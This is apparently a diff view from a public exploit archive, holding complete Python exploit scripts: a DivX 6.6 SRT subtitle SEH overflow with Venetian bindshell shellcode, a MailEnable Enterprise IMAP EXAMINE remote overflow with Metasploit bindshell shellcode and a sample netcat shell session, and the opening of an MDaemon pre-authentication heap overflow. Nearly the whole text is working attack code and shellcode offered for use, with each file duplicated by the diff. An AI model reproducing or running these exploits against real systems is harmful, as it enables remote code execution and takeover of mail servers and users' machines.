"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)
f=open(file,'w')
f.write("1 \n")
f.write("00:00:01,001 --> 00:00:02,001\n")
f.write(bindshell)
f.close()
print "DivX 6.6 SEH SRT Overflow - PoC\n";
print "http://www.offensive-security.com/0day/divx66.py.txt\n";
print "SRT has been created - ph33r \n";
# milw0rm.com [2008-04-18]
#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Administrator\Desktop>
#######################################################################
# file = name of avi video file
file="infidel.srt"
# Unicode friendly POP POP RET somewhere in DivX 6.6
# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
ret="\x94\x48"
# Align stack for register save
nudge="\x48\x6d"
# Payload building blocks
buffer="\x41" * 1032
xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
pushad="\x60\x6d" # Save stack registers,nop
pushfd="\x9c\x6d"
align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
popfd="\x9D\x6D" # popfd,nop
popad="\x61\x6D"# popad,nop
padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
rest= "\x01" * 5000000 # Buffer and shellcode canvas
# PoC Venetian Bindshell on port 4444 - ph33r
# Built on alternating 00 01 surface
# Venetian self decoding bindshell - 1580 bytes
bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40"
"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D"
"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80"
"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE"
"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D"
"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40"
"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D"
"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF"
"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D"
"\x40\x6D\x80\xBF\x6D\x40\x6D"
"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80"
"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2"
"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D"
"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40"
"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D"
"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80"
"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C"
"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D"
"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02"
"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40"
"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80"
"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F"
"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D"
"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40"
"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80"
"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40"
"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D"
"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80"
"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67"
"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D"
"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D"
"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80"
"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54"
"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40"
"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D"
"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D"
"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80"
"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94"
"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D"
"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D"
"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80"
"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3"
"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D"
"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xE4\x6D\x40\x6D\x80"
"\x49\x6D\x40\x6D\x80\x85\x6D\x40\x6D\x80\x49\x6D\x40\x6D\x80\x56"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x50\x6D"
"\x40\x6D\x80\x53\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x54\x6D\x40"
"\x6D\x80\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x93\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80"
"\xC6\x6D\x40\x6D\x80\x78\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x69\x6D\x40"
"\x6D\x80\x64\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D"
"\x80\x62\x6D\x40\x6D\x80\x6D\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80"
"\xE5\x6D\x40\x6D\x80\x69\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x58"
"\x6D\x40\x6D\x80\x29\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\x89\x6D"
"\x40\x6D\x80\xE6\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x43\x6D\x40"
"\x6D\x80\x89\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x31\x6D\x40\x6D"
"\x80\xBF\x6D\x40\x6D\x80\xF3\x6D\x40\x6D\x80\xA9\x6D\x40\x6D\x80"
"\xFE\x6D\x40\x6D\x80\x41\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xFD"
"\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x2B\x6D\x40\x6D\x80\x93\x6D"
"\x40\x6D\x80\x8C\x6D\x40\x6D\x80\x7A\x6D\x40\x6D\x80\x37\x6D\x40"
"\x6D\x80\xAB\x6D\x40\x6D\x80\xAA\x6D\x40\x6D\x80\xAB\x6D\x40\x6D"
"\x80\x67\x6D\x40\x6D\x80\x72\x6D\x40\x6D\x80\xFD\x6D\x40\x6D\x80"
"\xB3\x6D\x40\x6D\x80\x15\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\x74"
"\x6D\x40\x6D\x80\x44\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D"
"\x40\x6D\x80\x5A\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\x51\x6D\x40"
"\x6D\x80\x51\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\x51\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80"
"\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFE"
"\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\xAD\x6D"
"\x40\x6D\x80\xD8\x6D\x40\x6D\x80\x05\x6D\x40\x6D\x80\xCD\x6D\x40"
"\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD6\x6D\x40\x6D"
"\x80\x69\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80"
"\x37\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x8A"
"\x6D\x40\x6D\x80\x57\x6D\x40\x6D\x80\xFB\x6D\x40\x6D\x80\x83\x6D"
"\x40\x6D\x80\xC3\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\xFE\x6D\x40"
"\x6D\x80\xD6\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\xFF\x6D\x40\x6D"
"\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xEE\x6D\x40\x6D\x80"
"\xCE\x6D\x40\x6D\x80\xDF\x6D\x40\x6D\x80\x60\x6D\x40\x6D\x80\x52"
"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\xFF\x6D"
"\x40\x6D\x80\xCF\x6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)
f=open(file,'w')
f.write("1 \n")
f.write("00:00:01,001 --> 00:00:02,001\n")
f.write(bindshell)
f.close()
print "DivX 6.6 SEH SRT Overflow - PoC\n";
print "http://www.offensive-security.com/0day/divx66.py.txt\n";
print "SRT has been created - ph33r \n";
# milw0rm.com [2008-04-18]

272
platforms/windows/remote/1378.py
View file

@ -1,136 +1,136 @@
#!/usr/bin/python
############################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
# jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
# * Talz - for helping me out with the 1st stage shellcode
#
# FOR EDUCATION PURPOSES ONLY!
############################################################
# 1st stage shellcode:
############################################################
# [BITS 32]
#
# global _start
#
# _start:
#
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
#
# ;--- copy eip into ecx
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch ; ecx=-256;
# dec ch ; ecx=-256;
# jmp ecx ; lets jmp ecx (current location - 512)
############################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#####################################################
import sys
import struct
import socket
from time import sleep
if len(sys.argv)!=5:
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
print "\nDiscovered / Coded by mati@see-security.com\n"
print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Return Address - Win2k SP4 jmp ebx
returnaddress = "\x66\x4a\x4e\x7c"
# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode
sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.com\n"
print "[+] Connecting to " + sys.argv[1]
try:
s.connect((sys.argv[1],int(sys.argv[2])))
except:
print "Could not connect to IMAP server!"
sys.exit(0)
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A001 EXAMINE ' + buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
# milw0rm.com [2005-12-19]
#!/usr/bin/python
############################################################
#
# Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow
# Discovered and exploited by mati@see-security.com
# This vulnerability affects Mailenable Enterprise 1.1
# *without* the ME-10009.EXE patch.
#
# Details:
# * SEH gets overwritten at 965 (968 in VMWare) bytes in the EXAMINE command.
# * Filtering of 0x00 0x0a 0x0d 0x20 0x22
# * No space for shellcode, so 1st stage shellcode is used to
# jump back 512 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
# * Talz - for helping me out with the 1st stage shellcode
#
# FOR EDUCATION PURPOSES ONLY!
############################################################
# 1st stage shellcode:
############################################################
# [BITS 32]
#
# global _start
#
# _start:
#
# ;--- Taken from phrack #62 Article 7 Originally written by Aaron Adams
#
# ;--- copy eip into ecx
# fldz
# fnstenv [esp-12]
# pop ecx
# add cl, 10
# nop
# ;----------------------------------------------------------------------
# dec ch ; ecx=-256;
# dec ch ; ecx=-256;
# jmp ecx ; lets jmp ecx (current location - 512)
############################################################
# root@muts:/tmp# ./final.py 192.168.1.160 143 ftp ftp
#
# MailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch.
# Discovered / Coded by mati@see-security.com
#
# [+] Connecting to 192.168.1.160
# [+] * OK IMAP4rev1 server ready at 12/19/05 15:29:06
# [+] Logging in as ftp
# [+] a001 OK LOGIN completed
# [+] Sending evil buffer...
# [+] Done
#
# [+] Try connecting to port 4444 on victim IP - Muhahaha!
#
# root@slax:/tmp# nc -nv 192.168.1.160 4444
# (UNKNOWN) [192.168.1.160] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#####################################################
import sys
import struct
import socket
from time import sleep
if len(sys.argv)!=5:
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009 Patch."
print "\nDiscovered / Coded by mati@see-security.com\n"
print "Usage: %s <ip> <port> <user> <pass>\n" %sys.argv[0]
sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Return Address - Win2k SP4 jmp ebx
returnaddress = "\x66\x4a\x4e\x7c"
# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
sc +="\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
sc +="\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Second Stage Shellcode
sc2 = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfa"
sc2 +="\xa8\xc8\x2a\x83\xeb\xfc\xe2\xf4\x06\xc2\x23\x67\x12\x51\x37\xd5"
sc2 +="\x05\xc8\x43\x46\xde\x8c\x43\x6f\xc6\x23\xb4\x2f\x82\xa9\x27\xa1"
sc2 +="\xb5\xb0\x43\x75\xda\xa9\x23\x63\x71\x9c\x43\x2b\x14\x99\x08\xb3"
sc2 +="\x56\x2c\x08\x5e\xfd\x69\x02\x27\xfb\x6a\x23\xde\xc1\xfc\xec\x02"
sc2 +="\x8f\x4d\x43\x75\xde\xa9\x23\x4c\x71\xa4\x83\xa1\xa5\xb4\xc9\xc1"
sc2 +="\xf9\x84\x43\xa3\x96\x8c\xd4\x4b\x39\x99\x13\x4e\x71\xeb\xf8\xa1"
sc2 +="\xba\xa4\x43\x5a\xe6\x05\x43\x6a\xf2\xf6\xa0\xa4\xb4\xa6\x24\x7a"
sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
print "Discovered / Coded by mati@see-security.com\n"
print "[+] Connecting to " + sys.argv[1]
try:
s.connect((sys.argv[1],int(sys.argv[2])))
except:
print "Could not connect to IMAP server!"
sys.exit(0)
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Logging in as %s" % sys.argv[3]
s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
data = s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Sending evil buffer..."
s.send('A001 EXAMINE ' + buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
# milw0rm.com [2005-12-19]

304
platforms/windows/remote/2258.py
View file

@ -1,152 +1,152 @@
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
########################################################################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - mati@see-security.com
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
########################################################################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
########################################################################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
########################################################################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
